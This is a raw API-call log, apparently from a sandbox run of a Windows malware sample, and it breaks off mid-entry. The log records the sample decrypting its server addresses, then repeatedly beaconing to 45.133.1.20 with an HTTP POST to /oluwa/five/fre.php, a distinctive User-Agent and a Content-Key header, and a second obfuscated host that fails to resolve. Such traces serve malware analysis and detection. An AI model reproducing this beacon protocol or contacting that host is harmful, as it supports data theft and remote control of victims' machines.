1 [0224.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.554] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0224.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.556] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.561] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0224.561] GetProcessHeap () returned 0x6a0000 [0224.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.565] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0224.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.567] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0224.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.568] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0224.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.572] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0224.572] GetProcessHeap () returned 0x6a0000 [0224.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0224.572] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0224.572] GetProcessHeap () returned 0x6a0000 [0224.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0224.572] socket (af=2, type=1, protocol=6) returned 0x69c [0224.573] connect (s=0x69c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0224.604] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0224.604] GetProcessHeap () returned 0x6a0000 [0224.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0224.604] GetProcessHeap () returned 0x6a0000 [0224.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0224.605] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.606] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.606] GetProcessHeap () returned 0x6a0000 [0224.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0224.606] GetProcessHeap () returned 0x6a0000 [0224.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.607] GetProcessHeap () returned 0x6a0000 [0224.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0224.607] GetProcessHeap () returned 0x6a0000 [0224.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0224.608] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.609] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.609] GetProcessHeap () returned 0x6a0000 [0224.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0224.609] GetProcessHeap () returned 0x6a0000 [0224.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.609] send (s=0x69c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0224.610] send (s=0x69c, buf=0x6bb998*, len=159, flags=0) returned 159 [0224.610] GetProcessHeap () returned 0x6a0000 [0224.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0224.610] recv (in: s=0x69c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0224.687] GetProcessHeap () returned 0x6a0000 [0224.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0224.688] GetProcessHeap () returned 0x6a0000 [0224.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0224.690] GetProcessHeap () returned 0x6a0000 [0224.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0224.691] GetProcessHeap () returned 0x6a0000 [0224.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0224.691] closesocket (s=0x69c) returned 0 [0224.692] GetProcessHeap () returned 0x6a0000 [0224.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0224.692] GetProcessHeap () returned 0x6a0000 [0224.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.692] GetProcessHeap () returned 0x6a0000 [0224.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0224.693] GetProcessHeap () returned 0x6a0000 [0224.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0224.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13fc) returned 0x69c [0224.696] Sleep (dwMilliseconds=0xea60) [0224.701] GetProcessHeap () returned 0x6a0000 [0224.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0224.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.708] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.737] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0224.751] GetProcessHeap () returned 0x6a0000 [0224.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0224.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.765] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.767] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.768] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.768] GetProcessHeap () returned 0x6a0000 [0224.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0224.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.770] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0224.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.771] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.773] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0224.773] GetProcessHeap () returned 0x6a0000 [0224.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.774] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.775] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.777] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.778] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.778] GetProcessHeap () returned 0x6a0000 [0224.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0224.778] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.778] GetProcessHeap () returned 0x6a0000 [0224.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0224.779] GetProcessHeap () returned 0x6a0000 [0224.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.783] GetProcessHeap () returned 0x6a0000 [0224.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0224.783] GetProcessHeap () returned 0x6a0000 [0224.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0224.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.784] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.794] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0224.804] GetProcessHeap () returned 0x6a0000 [0224.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0224.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.805] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.806] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.807] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.807] GetProcessHeap () returned 0x6a0000 [0224.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0224.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.809] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0224.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.810] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.811] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0224.811] GetProcessHeap () returned 0x6a0000 [0224.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.812] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0224.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0224.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0224.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.816] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0224.816] GetProcessHeap () returned 0x6a0000 [0224.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0224.816] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0224.816] GetProcessHeap () returned 0x6a0000 [0224.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0224.816] socket (af=2, type=1, protocol=6) returned 0x6a0 [0224.817] connect (s=0x6a0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0224.844] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0224.844] GetProcessHeap () returned 0x6a0000 [0224.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0224.844] GetProcessHeap () returned 0x6a0000 [0224.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0224.845] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.845] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.846] GetProcessHeap () returned 0x6a0000 [0224.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0224.846] GetProcessHeap () returned 0x6a0000 [0224.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.846] GetProcessHeap () returned 0x6a0000 [0224.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0224.846] GetProcessHeap () returned 0x6a0000 [0224.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0224.847] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.848] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.848] GetProcessHeap () returned 0x6a0000 [0224.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0224.848] GetProcessHeap () returned 0x6a0000 [0224.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.849] send (s=0x6a0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0224.852] send (s=0x6a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0224.852] GetProcessHeap () returned 0x6a0000 [0224.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0224.852] recv (in: s=0x6a0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0224.932] GetProcessHeap () returned 0x6a0000 [0224.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0224.933] GetProcessHeap () returned 0x6a0000 [0224.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0224.933] GetProcessHeap () returned 0x6a0000 [0224.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0224.934] GetProcessHeap () returned 0x6a0000 [0224.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0224.934] closesocket (s=0x6a0) returned 0 [0224.935] GetProcessHeap () returned 0x6a0000 [0224.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0224.935] GetProcessHeap () returned 0x6a0000 [0224.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.935] GetProcessHeap () returned 0x6a0000 [0224.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0224.936] GetProcessHeap () returned 0x6a0000 [0224.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0224.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2ac) returned 0x6a0 [0224.938] Sleep (dwMilliseconds=0xea60) [0224.940] GetProcessHeap () returned 0x6a0000 [0224.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0224.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.943] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0224.961] GetProcessHeap () returned 0x6a0000 [0224.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d88f0 [0224.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.962] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6d88f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.967] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.969] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.969] GetProcessHeap () returned 0x6a0000 [0224.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d88f0 | out: hHeap=0x6a0000) returned 1 [0224.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.970] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0224.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.972] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.973] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0224.973] GetProcessHeap () returned 0x6a0000 [0224.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.980] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.981] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.983] GetProcessHeap () returned 0x6a0000 [0224.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0224.983] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.984] GetProcessHeap () returned 0x6a0000 [0224.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0224.987] GetProcessHeap () returned 0x6a0000 [0224.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.987] GetProcessHeap () returned 0x6a0000 [0224.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0224.987] GetProcessHeap () returned 0x6a0000 [0224.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0224.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0225.012] GetProcessHeap () returned 0x6a0000 [0225.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0225.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.013] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0225.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.014] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.015] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.015] GetProcessHeap () returned 0x6a0000 [0225.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0225.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.017] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0225.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.020] CryptDestroyKey (hKey=0x6ad020) returned 1 [0225.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.021] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0225.021] GetProcessHeap () returned 0x6a0000 [0225.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.022] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0225.022] 